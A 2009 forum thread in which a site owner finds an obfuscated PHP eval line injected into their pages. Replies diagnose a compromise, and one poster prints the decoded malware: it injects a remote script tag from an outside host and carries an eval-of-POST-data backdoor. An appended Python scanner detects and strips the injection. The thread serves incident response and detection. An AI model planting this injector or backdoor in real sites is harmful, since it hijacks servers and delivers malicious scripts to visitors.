
<?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Posted: Tue Nov 10, 2009 9:51 am
by nehrav
Hi,

I want advice on this from experts.

Some of my web documents are showing

Code: Select all

<?php eval(base64_decode('aWYoIWZ1......a long thread of code.............')); ?>
added automatically :banghead: in the first line of my web pages, on uploading them to the server :dubious: ,
whereas I haven't added any code of this sort on my own.

Does anybody have any idea why it's reacting so strangely.... :crazy:

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Posted: Tue Nov 10, 2009 10:03 am
by onion2k
That doesn't look good, but what it's actually doing depends on what the code is. Post it in full here (in code tags) and one of us will tell you exactly what it is.

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Posted: Tue Nov 10, 2009 10:06 am
by nehrav
onion2k wrote:That doesn't look good, but what it's actually doing depends on what the code is. Post it in full here (in code tags) and one of us will tell you exactly what it is.


Thanks for your quick reply onion, but is it safe to post it here? Secondly, is it somehow related to website hacking??

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Posted: Tue Nov 10, 2009 10:36 am
by Apollo
Yep, your website or server got hacked. Better change your passwords immediately, re-upload your site completely, and inform your hosting provider.

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Posted: Tue Nov 10, 2009 10:58 am
by pickle
Yes it's safe to post. As long as the eval() isn't executed (PHP code that is posted isn't executed), there's no harm. My guess is it's an iframe of some sort.

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Posted: Wed Nov 11, 2009 4:49 am
by nehrav
ok, then code automatically added on my index page is

Code: Select all

<?php eval(base64_decode('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')); ?>
Please, help me as I have no idea of this. I am new to php...

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Posted: Wed Nov 11, 2009 4:50 am
by nehrav
Apollo wrote:Yep, your website or server got hacked. Better change your passwords immediately, re-upload your site completely, and inform your hosting provider.
Which password I need to change, FTP or database or something else???

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Posted: Wed Nov 11, 2009 4:59 am
by Apollo
nehrav wrote:Which password I need to change, FTP or database or something else???
ALL!

Your account has been compromised. So better change any password you have that is related to this account.

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Posted: Wed Nov 11, 2009 5:08 am
by josh

Code: Select all

if(!function_exists('uq2')){function uq2($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3Zhc2Fpa2FyLm9yZy9tYW1ib3RzL3NlYXJjaC5waHAgPjwvc2NyaXB0Pg=='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);elseif(strpos($s,'<a'))$s=$a.$s;return$s;}function uq22($a,$b,$c,$d){global$uq21;$s=array();if(function_exists($uq21))call_user_func($uq21,$a,$b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='uq2')return;elseif($a=='ob_gzhandler')break;else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('uq2');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$uq2l=(($a=@set_error_handler('uq22'))!='uq22')?$a:0;eval(base64_decode($_POST['e']));
Which has the result of appending

Code: Select all

<script src=http://vasaikar.org/mambots/search.php ></script>
to the end of your body tag. And that url gives me a 404, probably returned the real code. The hacker did it this way so after he took it down there was no trace of what he did.

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Posted: Wed Nov 11, 2009 5:18 am
by nehrav
@Josh, what does this code mean & what is the hacker trying to do??

Please suggest how I can avoid this :banghead: ??

Re: <?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Posted: Thu Nov 12, 2009 5:46 am
by kaisellgren
Clean up everything you can find on the server, change all passwords (and possibly usernames too), update all software you have running there and avoid using less popular and unknown scripts/software. If it does not get better, you would be better off asking someone to take care of it for you.
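Added example, not code from any poster in this thread: a Python sketch that repeats josh's decoding statically (nothing is ever passed to eval) and finds every file carrying the injected first line, as a starting point for the cleanup kaisellgren describes. The function names, the sample payload and its example.invalid URL are constructed for illustration.

```python
import base64
import re
from pathlib import Path
from typing import Iterator, Optional

# Injected prefix as shown in the thread: <?php eval(base64_decode('...')); ?>
INJECTED = re.compile(
    rb"<\?php\s+eval\(\s*base64_decode\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1"
    rb"\s*\)\s*\)\s*;\s*\?>")
# Quoted base64 literals inside the decoded layer (the hidden <script> tag)
NESTED = re.compile(rb"base64_decode\(\s*(['\"])([A-Za-z0-9+/=]+)\1\s*\)")
# eval() of request data: the remote-control backdoor at the end of the payload
BACKDOOR = re.compile(rb"eval\(\s*base64_decode\(\s*\$_(POST|GET|REQUEST|COOKIE)\b")
URL = re.compile(rb"https?://[^\s'\"<>]+")


def analyze(data: bytes) -> Optional[dict]:
    """Statically inspect one file's bytes; returns None if not infected."""
    m = INJECTED.search(data)
    if m is None:
        return None
    try:
        layer1 = base64.b64decode(m.group(2))
        nested = [base64.b64decode(n.group(2)) for n in NESTED.finditer(layer1)]
    except ValueError:  # truncated or damaged blob: still report the hit
        layer1, nested = b"", []
    blobs = [layer1, *nested]
    urls = sorted({u.decode("latin-1") for b in blobs for u in URL.findall(b)})
    return {
        "offset": m.start(),                        # 0 means first line of file
        "backdoor": BACKDOOR.search(layer1) is not None,
        "urls": urls,                               # where the injected tag points
        "cleaned": data[:m.start()] + data[m.end():],
    }


def scan(root: str) -> Iterator[tuple]:
    """Yield (path, report) for every infected web document under root."""
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.suffix.lower() in {".php", ".html", ".htm"}:
            report = analyze(p.read_bytes())
            if report:
                yield p, report


def constructed_sample() -> bytes:
    # Constructed sample: same shape as the thread's payload, placeholder URL.
    tag = base64.b64encode(b"<script src=http://example.invalid/x.php ></script>")
    inner = b"$a=base64_decode('" + tag + b"');eval(base64_decode($_POST['e']));"
    return (b"<?php eval(base64_decode('" + base64.b64encode(inner)
            + b"')); ?>\n<html><body>hi</body></html>\n")
```

The `cleaned` bytes are for review and for diffing against a known-good copy; the advice above to re-upload the site and change all passwords still applies, since the injected line is only the visible symptom.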